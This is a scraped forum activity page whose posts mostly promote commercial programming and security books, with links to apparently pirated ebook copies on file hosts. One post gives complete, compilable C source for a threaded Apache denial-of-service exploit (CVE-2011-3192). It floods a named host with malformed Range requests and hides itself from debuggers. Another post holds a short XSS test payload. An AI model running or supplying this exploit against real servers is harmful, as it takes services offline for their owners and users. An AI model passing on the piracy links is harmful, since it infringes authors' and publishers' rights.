-
Posts
18715 -
Joined
-
Last visited
-
Days Won
701
Everything posted by Nytro
-
[h=2]Start Here! Learn Microsoft Visual C# 2010[/h] [h=3]Book Description[/h] Ready to learn programming? Start Here!™ Learn the fundamentals of modern programming with Visual C# 2010—and begin building your first apps for the desktop and web. If you have absolutely no previous experience, no problem—simply start here! This book introduces must-know concepts and techniques through easy-to-follow explanations, examples, and exercises. Here’s where you start learning Visual C# Learn how an application performs tasks by tracing its code Query and manipulate application data with LINQ Access web services with REST and SOAP Build simple apps with Windows® Presentation Foundation Explore rich Internet apps with Microsoft Silverlight® Find and fix errors by debugging your applications Put it all together by creating your first programs Table of Contents Chapter 1 Getting to Know C# Chapter 2 Developing a Web Project Chapter 3 Basic Data Manipulation Techniques Chapter 4 Using Collections to Store Data Chapter 5 Working with XML Chapter 6 Accessing a Web Service Chapter 7 Using the Windows Presentation Foundation Chapter 8 Working with Libraries Chapter 9 Creating Utility Applications Chapter 10 Using LINQ in Web Applications Chapter 11 Working with Silverlight Applications Chapter 12 Debugging Applications [h=3]Book Details[/h] Paperback: 394 pages Publisher: Microsoft Press (October 2011) Language: English ISBN-10: 0735657726 ISBN-13: 978-0735657724 File Size: 19.2 MiB [h=3]E-Book[/h] [FilePost] Microsoft.Press.Start.Here.Learn.Microsoft.Visual.CSharp.2010.Oct.2011.rar [FileJungle] Microsoft.Press.Start.Here.Learn.Microsoft.Visual.CSharp.2010.Oct.2011.rar [h=3]Paper Book[/h] [Amazon] Start Here! Learn Microsoft Visual C# 2010 Sursa: Start Here! Learn Microsoft Visual C# 2010 | Wow! eBook - Blog
-
[h=2]JavaScript & jQuery: The Missing Manual, 2nd Edition[/h] [h=3]Book Description[/h] JavaScript lets you supercharge your HTML with animation, interactivity, and visual effects—but many web designers find the language hard to learn. This jargon-free guide covers JavaScript basics and shows you how to save time and effort with the jQuery library of prewritten JavaScript code. You’ll soon be building web pages that feel and act like desktop programs, without having to do much programming. The important stuff you need to know: Make your pages interactive. Create JavaScript events that react to visitor actions. Use animations and effects. Build drop-down navigation menus, pop-ups, automated slideshows, and more. Improve your user interface. Learn how the pros make websites fun and easy to use. Collect data with web forms. Create easy-to-use forms that ensure more accurate visitor responses. Add a dash of Ajax. Enable your web pages to communicate with a web server without a page reload. Practice with living examples. Get step-by-step tutorials for web projects you can build yourself. Table of Contents Chapter 1 Writing Your First JavaScript Program Chapter 2 The Grammar of JavaScript Chapter 3 Adding Logic and Control to Your Programs Chapter 4 Introducing jQuery Chapter 5 Action/Reaction: Making Pages Come Alive with Events Chapter 6 Animations and Effects Chapter 7 Improving Your Images Chapter 8 Improving Navigation Chapter 9 Enhancing Web Forms Chapter 10 Expanding Your Interface Chapter 11 Introducing Ajax Chapter 12 Flickr and Google Maps Chapter 13 Getting the Most from jQuery Chapter 14 Going Further with JavaScript Chapter 15 Troubleshooting and Debugging [h=3]Book Details[/h] Paperback: 536 pages Publisher: O’Reilly Media / Pogue Press; 2nd Edition (October 2011) Language: English ISBN-10: 1449399029 ISBN-13: 978-1449399023 File Size: 21.5 MiB [h=3]E-Book[/h] [FilePost] Oreilly.JavaScript.and.jQuery.The.Missing.Manual.2nd.Edition.Oct.2011.rar [FileJungle] Oreilly.JavaScript.and.jQuery.The.Missing.Manual.2nd.Edition.Oct.2011.rar [h=3]Paper Book[/h] [Amazon] JavaScript & jQuery: The Missing Manual, 2nd Edition Sursa: JavaScript & jQuery: The Missing Manual, 2nd Edition | Wow! eBook - Blog
-
[h=2]Professional C++, 2nd Edition[/h] [h=3]Book Description[/h] Essential reading for experienced developers who are determined to master the latest release of C++ Although C++ is often the language of choice from game programming to major commercial software applications, it is also one of the most difficult to master. With this no-nonsense book, you will learn to conquer the latest release of C++. The author deciphers little-known features of C++, shares detailed code examples that you can then plug into your own code, and reveals the significant changes to C++ that accompany the latest release. You’ll discover how to design and build applications that solve real-world problems and then implement the solution using the full capabilities of the language. Appeals to experienced developers who are looking for a higher level of learning Drills down the extensive changes to the latest C++ standard, C++11, including enhancements made to run-time performance, standard library, language usability, and core language Zeroes in on explaining the more poorly understood elements of the C++ feature set and addresses common pitfalls to avoid Includes case studies that feature extensive, working code that has been tested on Windows and Linux platforms Intertwines text with useful tips, tricks, and workarounds Packed with best practices for programming, testing, and debugging applications, this book is vital for taking your C++ skills to the next level. From the Back Cover Master the latest release of the C++ language: C++11 C++ is often the language of choice for writing fast, powerful, and enterprise-class object-oriented programs, be it games or major commercial software applications. However, there’s no two ways around it: C++ can be difficult to master. With this no-nonsense book, you will learn to conquer the latest version of the C++ language: C++11. The authors share real-world examples, decipher little-known features of C++, and reveal the significant changes to C++ that accompany the latest release. Ultimately, you’ll discover programming methodologies, reusable design patterns, and good programming style that will increase the quality of your code and improve your programming efficiency. Professional C++, 2nd Edition: Offers detailed code examples that you can plug into your own code Takes you on a technical tour of C++ and the STL, and explores the unusual and quirky aspects of this language Exposes best practices for using the more advanced features of C++, including operator overloading, managing memory, writing templates, and writing multithreaded code Discusses techniques for writing cross-language and cross-platform code Teaches you the importance of code reuse as well as the nuances of writing readable C++ code [h=3]Book Details[/h] Paperback: 1104 pages Publisher: Wrox; 2nd Edition (October 2011) Language: English ISBN-10: 0470932449 ISBN-13: 978-0470932445 File Size: 5.8 MiB [h=3]E-Book[/h] [FilePost] Wrox.Professional.CPP.2nd.Edition.Oct.2011.epub [FileJungle] Wrox.Professional.CPP.2nd.Edition.Oct.2011.epub [h=3]Paper Book[/h] [Amazon] Professional C++, 2nd Edition Sursa: Professional C++, 2nd Edition | Wow! eBook - Blog
-
[h=2]Optimizing Windows 7 Pocket Consultant[/h] [h=3]Book Description[/h] Portable and precise, this pocket-sized guide delivers ready answers for optimizing the performance of your Windows 7-based PC. Zero in on core tuning, customization, and troubleshooting tasks using quick-reference tables, instructions, and lists. Topics include system boot and startup, software and hardware, search and indexing, system health, and personalizing the interface. You’ll get the focused information you need to solve problems and get the job done. Table of Contents Chapter 1 Customizing the Windows 7 Interface Chapter 2 Personalizing the Appearance of Windows 7 Chapter 3 Customizing Boot, Startup, and Power Options Chapter 4 Organizing, Searching, and Indexing Chapter 5 Optimizing Your Computer’s Software Chapter 6 Tracking System Performance and Health Chapter 7 Analyzing and Logging Performance Chapter 8 Optimizing Performance Tips and Techniques Appendix Firmware Interface Options About the Author William R. Stanek has more than 20 years’ experience in systems management and advanced programming. He is an award-winning author who’s written more than 100 books, including the popular Windows Server® 2008 Inside Out. He is Series Editor for the Pocket Consultant line of books from Microsoft Press®. [h=3]Book Details[/h] Paperback: 208 pages Publisher: Microsoft Press (September 2011) Language: English ISBN-10: 0735661650 ISBN-13: 978-0735661653 File Size: 11.5 MiB [h=3]E-Book[/h] [FilePost] Microsoft.Press.Optimizing.Windows.7.Pocket.Consultant.Sep.2011.rar [FileJungle] Microsoft.Press.Optimizing.Windows.7.Pocket.Consultant.Sep.2011.rar [h=3]Paper Book[/h] [Amazon] Optimizing Windows 7 Pocket Consultant Sursa: Optimizing Windows 7 Pocket Consultant | Wow! eBook - Blog
-
[h=2]Routing TCP/IP, Volume II[/h] [h=3]Book Description[/h] A detailed examination of exterior routing protocols and advanced IP routing issues Routing TCP/IP, Volume II, enables you to: Master the operational components, configuration, and troubleshooting of BGP-4-the de facto interdomain routing protocol Understand the operation, configuration, and troubleshooting of NAT Learn how to deploy, configure, and troubleshoot IP multicast routing through an array of case studies and exercises Familiarize yourself with the design goals and current state of IPv6, the new generation of the IP protocol Implement router management through a diverse range of expert-tested methods Test and validate your knowledge with practical, comprehensive review questions, configuration exercises, and troubleshooting exercises Further your CCIE preparation while mastering advanced TCP/IP concepts The complexities of exterior gateway protocols, including TCP connections, message states, path attributes, interior routing protocol interoperation, and setting up neighbor connections, require a comprehensive understanding of router operations in order to manage network growth. Routing TCP/IP, Volume II, provides you with the expertise necessary to understand and implement Border Gateway Protocol Version 4 (BGP-4), multicast routing, Network Address Translation (NAT), IPv6, and effective router management techniques. Jeff Doyle’s practical approach, easy-to-read format, and comprehensive topic coverage make this book an instant classic and a must-have addition to any network professional’s library. Routing TCP/IP, Volume II, expands upon the central theme of Volume I: scalability and management of network growth. Volume II moves beyond the interior gateway protocols covered in Volume I to examine both inter-autonomous system routing and more exotic routing issues such as multicasting and IPv6. This second volume follows the same informational structure used effectively in Volume I: discussing the topic fundamentals, following up with a series of configuration examples designed to show the concept in a real-world environment, and relying on tested troubleshooting measures to resolve any problems that might arise. This book helps you accomplish more than earning the highly valued CCIE number after your name; it also helps you develop the knowledge and skills that are essential to perform your job at an expert level. Whether you are pursuing CCIE certification, need to review for your CCIE recertification exam, or are just looking for expert-level advice on advanced routing issues, Routing TCP/IP, Volume II, helps you understand foundation concepts and apply best practice techniques for effective network growth and management. [h=3]Book Details[/h] Hardcover: 976 pages Publisher: Cisco Press (April 2001) Language: English ISBN-10: 1578700892 ISBN-13: 978-1578700899 File Size: 16.0 MiB [h=3]E-Book[/h] [FilePost] Cisco.Press.Routing.TCP.IP.Vol.II.Apr.2001.rar [FileJungle] Cisco.Press.Routing.TCP.IP.Vol.II.Apr.2001.rar [h=3]Paper Book[/h] [Amazon] Routing TCP/IP, Volume II Sursa: Routing TCP/IP, Volume II | Wow! eBook - Blog
-
[h=2]Network Security Technologies and Solutions[/h] [h=3]Book Description[/h] Network Security Technologies and Solutions is a comprehensive reference to the most cutting-edge security products and methodologies available to networking professionals today. This book helps you understand and implement current, state-of-the-art network security technologies to ensure secure communications throughout the network infrastructure. With an easy-to-follow approach, this book serves as a central repository of security knowledge to help you implement end-to-end security solutions and provides a single source of knowledge covering the entire range of the Cisco network security portfolio. The book is divided into five parts mapping to Cisco security technologies and solutions: perimeter security, identity security and access management, data privacy, security monitoring, and security management. Together, all these elements enable dynamic links between customer security policy, user or host identity, and network infrastructures. With this definitive reference, you can gain a greater understanding of the solutions available and learn how to build integrated, secure networks in today’s modern, heterogeneous networking environment. This book is an excellent resource for those seeking a comprehensive reference on mature and emerging security tactics and is also a great study guide for the CCIE Security exam. “Yusuf’s extensive experience as a mentor and advisor in the security technology field has honed his ability to translate highly technical information into a straight-forward, easy-to-understand format. If you’re looking for a truly comprehensive guide to network security, this is the one! ” –Steve Gordon, Vice President, Technical Services, Cisco Yusuf Bhaiji, CCIE No. 9305 (R&S and Security), has been with Cisco for seven years and is currently the program manager for Cisco CCIE Security certification. He is also the CCIE Proctor in the Cisco Dubai Lab. Prior to this, he was technical lead for the Sydney TAC Security and VPN team at Cisco. Filter traffic with access lists and implement security features on switches Configure Cisco IOS router firewall features and deploy ASA and PIX Firewall appliances Understand attack vectors and apply Layer 2 and Layer 3 mitigation techniques Secure management access with AAA Secure access control using multifactor authentication technology Implement identity-based network access control Apply the latest wireless LAN security solutions Enforce security policy compliance with Cisco NAC Learn the basics of cryptography and implement IPsec VPNs, DMVPN, GET VPN, SSL VPN, and MPLS VPN technologies Monitor network activity and security incident response with network and host intrusion prevention, anomaly detection, and security monitoring and correlation Deploy security management solutions such as Cisco Security Manager, SDM, ADSM, PDM, and IDM Learn about regulatory compliance issues such as GLBA, HIPPA, and SOX This book is part of the Cisco CCIE Professional Development Series from Cisco Press, which offers expert-level instruction on network design, deployment, and support methodologies to help networking professionals manage complex networks and prepare for CCIE exams. [h=3]Book Details[/h] Hardcover: 840 pages Publisher: Cisco Press (March 2008) Language: English ISBN-10: 1587052466 ISBN-13: 978-1587052460 File Size: 19.1 MiB [h=3]E-Book[/h] [FilePost] Cisco.Press.Network.Security.Technologies.and.Solutions.Mar.2008.rar [FileJungle] Cisco.Press.Network.Security.Technologies.and.Solutions.Mar.2008.rar [h=3]Paper Book[/h] [Amazon] Network Security Technologies and Solutions Sursa: Network Security Technologies and Solutions | Wow! eBook - Blog
-
[h=2]Security Administrator Street Smarts, 3rd Edition[/h] [h=3]Book Description[/h] A step-by-step guide to the tasks involved in security administration If you aspire to a career in security administration, one of your greatest challenges will be gaining hands-on experience. This book takes you through the most common security admin tasks step by step, showing you the way around many of the roadblocks you can expect on the job. It offers a variety of scenarios in each phase of the security administrator’s job, giving you the confidence of first-hand experience. In addition, this is an ideal complement to the brand-new, bestselling CompTIA Security+ Study Guide, 5th Edition or the CompTIA Security+ Deluxe Study Guide, 2nd Edition, the latest offerings from Sybex for CompTIA’s Security+ SY0-301 exam. Targets security administrators who confront a wide assortment of challenging tasks and those seeking a career in security administration who are hampered by a lack of actual experience Walks you through a variety of common tasks, demonstrating step by step how to perform them and how to circumvent roadblocks you may encounter Features tasks that are arranged according to four phases of the security administrator’s role: designing a secure network, creating and implementing standard security policies, identifying insecure systems in an existing environment, and training both onsite and remote users Ideal hands-on for those preparing for CompTIA’s Security+ exam (SY0-301) This comprehensive workbook provides the next best thing to intensive on-the-job training for security professionals. From the Back Cover Develop the skills you need in the real world Hit the ground running with the street-smart training you’ll find in this practical guide to security administration. Using a “year in the life” approach, it gives you an inside look at the common responsibilities of security administrators, with key information organized around the actual day-to-day tasks, scenarios, and challenges you’ll face in the field. Updated for CompTIA Security+ Exam SY0-301, this valuable training tool is loaded with hands-on, step-by-step exercises covering all phases of a security administrator’s job, including: Designing a secure network environment Creating and implementing standard security policies and practices Identifying insecure systems in physical and digital environments Providing training to onsite and remote users An invaluable study tool This no-nonsense book also covers common tasks that CompTIA expects all of its Security+ candidates to know how to perform. So whether you’re preparing for certification or seeking practical skills to break into the field, you’ll find the instruction you need, including: Performing an initial risk assessment Hardening all systems—services, ports, OS,and more Encrypting files and securing data storage Creating and managing user accounts Deploying IPSec and securing remote systems Securing Internet activity, networks, and wireless Testing, pen testing, tracking, profiling, and troubleshooting The Street Smarts series is designed to help current or aspiring IT professionals put their certification to work for them. Full of practical, real world scenarios, each book features actual tasks from the field and then offers step-by-step exercises that teach the skills necessary to complete those tasks. And because the exercises are based upon exam objectives from leading technology certifications, each Street Smarts book can be used as a lab manual for certification prep. Step-by-step exercises teach you hands-on skills Real world scenarios put those skills in perspective REVISED FOR THE UPDATED SECURITY+ EXAM (SY0-301) [h=3]Book Details[/h] Paperback: 624 pages Publisher: Sybex; 3rd Edition (June 2011) Language: English ISBN-10: 1118061160 ISBN-13: 978-1118061169 File Size: 56.0 MiB [h=3]E-Book[/h] [FilePost] Sybex.Security.Administrator.Street.Smarts.Jun.2011.epub [FileJungle] Sybex.Security.Administrator.Street.Smarts.Jun.2011.epub [h=3]Paper Book[/h] [Amazon] Security Administrator Street Smarts, 3rd Edition Sursa: Security Administrator Street Smarts, 3rd Edition | Wow! eBook - Blog
-
[h=2]Engineering Information Security[/h] [h=3]Book Description[/h] Information security is the act of protecting information from unauthorized access, use, disclosure, disruption, modification, or destruction. This book discusses why information security is needed and how security problems can have widespread impacts. It covers the complete security lifecycle of products and services, starting with requirements and policy development and progressing through development, deployment, and operations, and concluding with decommissioning. Professionals in the sciences, engineering, and communications fields will turn to this resource to understand the many legal, technical, competitive, criminal and consumer forces and influences that are rapidly changing our information dependent society. From the Back Cover From design to deployment to decommissioning: a systems engineering approach to information security With this book as a guide, readers learn to apply a tested and proven methodology to address the information security concerns of any organization, ensuring that specific classes of information are only accessible to designated users. The methodology is based on systems engineering, a set of concepts that enable the systematic documentation of objectives and set forth the functional and performance capabilities needed to achieve those objectives. Because the book considers the complete life cycle of security systems, it also guides readers through deployment, operations, and eventual decommissioning. Moreover, the book goes well beyond technical requirements, enabling the full account of all aspects of an organization’s needs, including: Day-to-day operations Services and products provided and consumer markets served Overall competitive environment and key competitors Legal and regulatory requirements Vulnerability to criminal activity The book includes a CD which contains more than 200 color figures and diagrams to help illustrate and simplify complex systems and processes. Numerous examples throughout the book show step by step how to put security concepts and mechanisms into practice. The CD also includes a number of useful appendices, including a listing of individual state privacy laws, a sample enterprise security policy document, and a sample request for proposal.By presenting a systems engineering approach to information security, this book enables security practitioners and students of information security to cope with rapid changes in technology in order to consistently provide the level of information security needed to fully protect the interests of an organization, its personnel, and its customers. [h=3]Book Details[/h] Hardcover: 728 pages Publisher: Wiley-IEEE Press (July 2011) Language: English ISBN-10: 0470565128 ISBN-13: 978-0470565124 File Size: 9.2 MiB [h=3]E-Book[/h] [FilePost] Wiley-IEEE.Engineering.Information.Security.Jul.2011.rar [FileJungle] Wiley-IEEE.Engineering.Information.Security.Jul.2011.rar [h=3]Paper Book[/h] [Amazon] Engineering Information Security Sursa: Engineering Information Security | Wow! eBook - Blog
-
[h=2]Expert Oracle and Java Security[/h] [h=3]Book Description[/h] Expert Oracle and Java Security: Programming Secure Oracle Database Applications with Java provides resources that every Java and Oracle database application programmer needs to ensure that they have guarded the security of the data and identities entrusted to them. You’ll learn to consider potential vulnerabilities, and to apply best practices in secure Java and PL/SQL coding. Author David Coffin shows how to develop code to encrypt data in transit and at rest, to accomplish single sign-on with Oracle proxy connections, to generate and distribute two-factor authentication tokens from the Oracle server using pagers, cell phones (SMS), and e-mail, and to securely store and distribute Oracle application passwords. Early chapters lay the foundation for effective security in an Oracle/Java environment. Each of the later chapters brings example code to a point where it may be applied as-is to address application security issues. Templates for applications are also provided to help you bring colleagues up to the same secure application standards. If you are less familiar with either Java or Oracle PL/SQL, you will not be left behind; all the concepts in this book are introduced as to a novice and addressed as to an expert. Helps you protect against data loss, identity theft, SQL injection, and address spoofing Provides techniques for encryption on network and disk, code obfuscation and wrap, database hardening, single sign-on and two-factor Provides what database administrators need to know about secure password distribution, Java secure programming, Java stored procedures, secure application roles in Oracle, logon triggers, database design, various connection pooling schemes, and much more What you’ll learn Guard against data loss, identity theft, SQL Injection, and to address spoofing Protect sensitive data through encryption, both on disk and on the wire Control access to data using secure roles, single sign-on, proxy connections, and two-factor authentication Protect sensitive source ode through randomization, obfuscation, and wrapping Thwart attempts at SQL injection and other common attacks Manage constraints on the visibility of data and the scope of access Who this book is for Expert Oracle and Java Security: Programming Secure Oracle Database Applications with Java is for every Java developer who uses an Oracle database. It is also for every Oracle database administrator or PL/SQL programmer who supports Java client and web applications. Whatever role you play in developing and supporting Java and Oracle applications, you need to address computer, application, data, and identity security. This book offers the tools you’ll need to effectively manage security across all aspects of the applications you support. Table of Contents Introduction Oracle Security Secure Java Development Concepts Java Stored Procedures Adding Public Key Encryption Adding Secret Password Encryption A Working Model for Data Encryption in Transit Implementing Single Sign On Implementing Two-Factor Authentication Application Identification and Authorization Enhancing Our Security Administration of This Security System [h=3]Book Details[/h] Paperback: 472 pages Publisher: Apress (September 2011) Language: English ISBN-10: 1430238313 ISBN-13: 978-1430238317 File Size: 8.8 MiB [h=3]E-Book[/h] [FilePost] Apress.Expert.Oracle.and.Java.Security.Sep.2011.rar [FileJungle] Apress.Expert.Oracle.and.Java.Security.Sep.2011.rar [h=3]Paper Book[/h] [Amazon] Expert Oracle and Java Security Sursa: Expert Oracle and Java Security | Wow! eBook - Blog
-
[h=2]Securing SQL Server[/h] [h=3]Book Description[/h] There is a lot at stake for administrators taking care of servers, since they house sensitive data like credit cards, social security numbers, medical records, and much more. In Securing SQL Server you will learn about the potential attack vectors that can be used to break into your SQL Server database, and how to protect yourself from these attacks. Written by a Microsoft SQL Server MVP and MCM, you will learn how to properly secure your database, from both internal and external threats. Best practices and specific tricks employed by the author will also be revealed. Learn expert techniques to protect your SQL database environment. Author Denny Cherry is a Microsoft MVP and MCM for his expertise in the SQL Server product Learn expert techniques to protect your SQL database environment Discover how to identify what an intruder accessed or damaged Table of Contents Chapter 1: Securing the Network Chapter 2: Database Encryption Chapter 3: SQL Password Security Chapter 4: Securing the Instance Chapter 5: Additional Security for an Internet Facing SQL Server and Application Chapter 6: SQL Injection Attacks Chapter 7: Database Backup Security Chapter 8: Auditing for Security Chapter 9: Server Rights Appendix A: External Audit Checklists [h=3]Book Details[/h] Paperback: 272 pages Publisher: Syngress (February 2011) Language: English ISBN-10: 1597496251 ISBN-13: 978-1597496254 File Size: 4.4 MiB [h=3]E-Book[/h] [FilePost] Syngress.Securing.SQL.Server.Feb.2011.rar [FileJungle] Syngress.Securing.SQL.Server.Feb.2011.rar [h=3]Paper Book[/h] [Amazon] Securing SQL Server Sursa: Securing SQL Server | Wow! eBook - Blog
-
[h=2]Beginning Arduino Programming[/h] [h=3]Book Description[/h] Beginning Arduino Programming provides a clear introduction to writing Arduino code, building your skills with Arduino through a series of well-designed hardware and software building blocks. Once you have read this book, you’ll be ready to program Arduino in exactly the ways you want for your future projects. Beginning Arduino Programming lets you discover new journeys with your Arduino board through programming. While everyone knows that Arduino is a platform for hardware hackers—be they engineers, artist or maker-enthusiasts—your Arduino board cannot function without code. This book will show you the fundamentals of programming and how to program your Arduino board to do the things you want it to do. You’ll learn from first principles the core Arduino programming language, examining how to program loops, variables, arrays, and functions. While these features are common to many languages, you’ll also learn how they are used specifically for Arduino. Beginning Arduino Programming uses the sketching analogy, which means you’ll find yourself writing snippets of code that do interesting things very quickly. You’ll also learn how to code in a good, succinct Arduino style that other programmers will respect. As you read Beginning Arduino Programming, you’ll learn how to make your Arduino code talk directly to the chips and sensors on your boards, taking into account pulse width, timing and sensor characteristics, all under your control. You’ll then be ready to discover the joys of the existing Arduino open source libraries, so you can benefit from the code that other people have already created, and even think about sharing your own Arduino code projects in the future. What you’ll learn Start programming quickly with Arduino sketches Get up to speed with the Arduino programming language Write code that interacts with devices such as sensors and motors How to code around pulse widths, timing and sensor characteristics Work with time delays in your Arduino coding projects Write your own, new Arduino functions Write concise and well-written code that other programmers will respect Use existing Arduino libraries, and create new ones! Who this book is for This book is for all Arduino board users who want to learn to program the Arduino board, regardless of hardware version or which devices are connected to the board. You do not need to have programmed before, but if you have, then you’ll learn how to apply core coding features in the Arduino context. Table of Contents Getting Started Sketching in Code Working With Variables Making Decisions Digital Ins and Outs Analog in, Analog out Functions, Time, and Interrupts Arrays for Arduino Writing New Functions for Arduino Arduino Libraries Arduino Hardware 10 Where to Go from Here? Appendix A: Common Circuits Appendix B: Arduino Math [h=3]Book Details[/h] Paperback: 272 pages Publisher: Apress (October 2011) Language: English ISBN-10: 1430237775 ISBN-13: 978-1430237778 File Size: 39.3 MiB [h=3]E-Book[/h] [FilePost] Apress.Beginning.Arduino.Programming.Oct.2011.rar [FileJungle] Apress.Beginning.Arduino.Programming.Oct.2011.rar [h=3]Paper Book[/h] [Amazon] Beginning Arduino Programming Sursa: Beginning Arduino Programming | Wow! eBook - Blog
-
[h=2]Arduino Robotics[/h] [h=3]Book Description[/h] This book will show you how to use your Arduino to control a variety of different robots, while providing step-by-step instructions on the entire robot building process. You’ll learn Arduino basics as well as the characteristics of different types of motors used in robotics. You also discover controller methods and failsafe methods, and learn how to apply them to your project. The book starts with basic robots and moves into more complex projects, including a GPS-enabled robot, a robotic lawn mower, a fighting bot, and even a DIY Segway-clone. Introduction to the Arduino and other components needed for robotics Learn how to build motor controllers Build bots from simple line-following and bump-sensor bots to more complex robots that can mow your lawn, do battle, or even take you for a ride What you’ll learn Basics of motor-control Basics of PCB design and fabrication R/C control and decoding Autonomous sensor guidance Frame building from various materials Instructions for a variety of robot designs Who this book is for Electronics and robotics hobbyists and DIY builders. Table of Contents The Basics Arduino for Robotics Let’s Get Moving Linus the Line-Bot Wally the Wall-Bot Making PCBs The Bug-Bot Explorer-Bot RoboBoat Lawn-Bot 400 The Seg-Bot The Battle-Bot Alternate Control [h=3]Book Details[/h] Paperback: 628 pages Publisher: Apress (July 2011) Language: English ISBN-10: 1430231831 ISBN-13: 978-1430231837 File Size: 42.2 MiB [h=3]E-Book[/h] [FilePost] Apress.Arduino.Robotics.Jul.2011.rar [FileJungle] Apress.Arduino.Robotics.Jul.2011.rar [h=3]Paper Book[/h] [Amazon] Arduino Robotics Sursa: Arduino Robotics | Wow! eBook - Blog
-
Apache HTTP Server Denial of Service /* * This is a reverse engineered version of the exploit for CVE-2011-3192 made * by ev1lut10n (http://jayakonstruksi.com/backupintsec/rapache.tgz). * Copyright 2011 Ramon de C Valle <rcvalle@redhat.com> * * Compile with the following command: * gcc -Wall -pthread -o rcvalle-rapache rcvalle-rapache.c */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/ptrace.h> #include <sys/types.h> #include <sys/socket.h> #include <netdb.h> #include <unistd.h> #include <pthread.h> void ptrace_trap(void) __attribute__ ((constructor)); void ptrace_trap(void) { if (ptrace(PTRACE_TRACEME, 0, 0, 0) < 0) { write(fileno(stdout), "Segmentation fault\n", 19); exit(-1); } } void w4rn41dun14mu(int attr, int fg, int bg) { char command[13]; sprintf(command, "%c[%d;%d;%dm", 0x1b, attr, fg+30, bg+40); printf("%s", command); } void banner() { w4rn41dun14mu(0, 1, 0); fwrite("Remote Apache Denial of Service Exploit by ev1lut10n\n", 53, 1, stdout); } void gime_er_mas() { printf("%c%s", 0x1b, "[2J"); printf("%c%s", 0x1b, "[1;1H"); puts("\nsorry dude there's an error..."); } struct thread_info { pthread_t thread_id; int thread_num; char *argv_string; }; static void * thread_start(void *arg) { struct thread_info *tinfo = (struct thread_info *) arg; char hostname[64]; int j; strcpy(hostname, tinfo->argv_string); j = 0; while (j != 10) { struct addrinfo hints; struct addrinfo *result, *rp; int sfd, s; ssize_t nwritten; memset(&hints, 0, sizeof(struct addrinfo)); hints.ai_family = AF_UNSPEC; hints.ai_socktype = SOCK_STREAM; hints.ai_flags = 0; hints.ai_protocol = 0; s = getaddrinfo(hostname, "http", &hints, &result); if (s != 0) { fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(s)); exit(EXIT_FAILURE); } for (rp = result; rp != NULL; rp = rp->ai_next) { sfd = socket(rp->ai_family, rp->ai_socktype, rp->ai_protocol); if (sfd == -1) continue; if (connect(sfd, rp->ai_addr, rp->ai_addrlen) == -1) close(sfd); } if (result != NULL) freeaddrinfo(result); nwritten = write(sfd, "HEAD / HTTP/1.1\n" "Host:localhost\n" "Range:bytes=0-,0-\n" "Accept-Encoding: gzip", 71); if (nwritten == -1) close(sfd); usleep(300000); j++; } return 0; } int main(int argc, char *argv[]) { int i; struct thread_info tinfo; banner(); if (argc <= 1) { w4rn41dun14mu(0, 2, 0); fwrite("\n[-] Usage : ./rapache hostname\n", 32, 1, stdout); return 0; } w4rn41dun14mu(0, 3, 0); printf("[+] Attacking %s please wait in minutes ...\n", argv[1]); while (1) { i = 0; while (i != 50) { tinfo.thread_num = i; tinfo.argv_string = argv[1]; pthread_create(&tinfo.thread_id, NULL, &thread_start, &tinfo); usleep(500000); i++; } } } Sursa: Apache HTTP Server Denial of Service
-
<script>alert(1)</script> <img src="" onerror="alert(123)" />
-
[h=2]Penetration Tester’s Open Source Toolkit, 3rd Edition[/h] [h=3]Book Description[/h] Great commercial penetration testing tools can be very expensive and sometimes hard to use or of questionable accuracy. This book helps solve both of these problems. The open source, no-cost penetration testing tools presented do a great job and can be modified by the user for each situation. Many tools, even ones that cost thousands of dollars, do not come with any type of instruction on how and in which situations the penetration tester can best use them. Penetration Tester’s Open Source Toolkit, Third Edition, expands upon existing instructions so that a professional can get the most accurate and in-depth test results possible. Real-life scenarios are a major focus so that the reader knows which tool to use and how to use it for a variety of situations. Details current open source penetration testing tools Presents core technologies for each type of testing and the best tools for the job New to this edition: Enterprise application testing, client-side attacks and updates on Metasploit and Backtrack Review “Jeremy Faircloth continues to write about computer and network security in ways that help the InfoSec community. In Penetration Tester’s Open Source Toolkit, Third Edition he combines his sharp insight into a wide variety of technologies, diverse penetration testing approaches and several penetration testing tools (then showcases these tools in action in the case study in each chapter) so the student of penetration testing can go out and get it done. This is just the kind of writing we should be expecting from our front runners in IT to be doing to support our Enterprise.” –Tim Hoffman, President, Alida Connection “All in all Penetration Tester’s Open Source Toolkit is a good read. Clear, concise and made me want to put to work the knowledge I had learnt at the end of each chapter so that I could say, yes I do understand how that works and how to use it in future tests.” –review on Hakin9.org [h=3]Book Details[/h] Paperback: 464 pages Publisher: Syngress; 3rd Edition (August 2011) Language: English ISBN-10: 1597496278 ISBN-13: 978-1597496278 File Size: 26.4 MiB [h=3]E-Book[/h] [FilePost] Syngress.Penetration.Testers.Open.Source.Toolkit.3rd.Edition.Aug.2011.rar [FileJungle] Syngress.Penetration.Testers.Open.Source.Toolkit.3rd.Edition.Aug.2011.rar [h=3]Paper Book[/h] [Amazon] Penetration Tester’s Open Source Toolkit, 3rd Edition Sursa: Penetration Tester’s Open Source Toolkit, 3rd Edition | Wow! eBook - Blog
-
[h=2]The Basics of Hacking and Penetration Testing[/h] [h=3]Book Description[/h] The Basics of Hacking and Penetration Testing serves as an introduction to the steps required to complete a penetration test or perform an ethical hack from beginning to end. No prior hacking experience is needed. You learn how to properly utilize and interpret the results of modern day hacking tools, which are required to complete a penetration test. Tool coverage includes Backtrack Linux, Google reconnaissance, MetaGooFil, dig, Nmap, Nessus, Metasploit, Fast Track Autopwn, Netcat, Hacker Defender rootkit, and more. A simple and clean explanation of how to effectively utilize these tools as well as the introduction to a four-step methodology for conducting a penetration test or hack, will provide you with know-how required to jump start your career or gain a better understanding of offensive security. The book serves as an introduction to penetration testing and hacking and will provide you with a solid foundation of knowledge. After completing the book readers will be prepared to take on in-depth and advanced topics in hacking and penetration testing. The book walks through each of the steps and tools in a structured, orderly manner allowing readers to understand how the output from each tool can be fully utilized in the subsequent phases of the penetration test. This process allows readers to clearly see how the tools and phases relate. Each chapter contains hands-on examples and exercises that are designed to teach you how to interpret the results and utilize those results in later phases Written by an author who works in the field as a Penetration Tester and who teaches Offensive Security, Penetration Testing, and Ethical Hacking, and Exploitation classes at Dakota State University Utilizes the Backtrack Linux distribution and focuses on the seminal tools required to complete a penetration test Review “Have you heard of penetration testing but have no idea what it entails? This is the perfect book to get you started, easy to read, does not assume prior knowledge, and is up-to-date. I strongly recommend Pat’s latest work.” -Jared DeMott, Principle Security Researcher, Crucial Security, Inc. [h=3]Book Details[/h] Paperback: 180 pages Publisher: Syngress (August 2011) 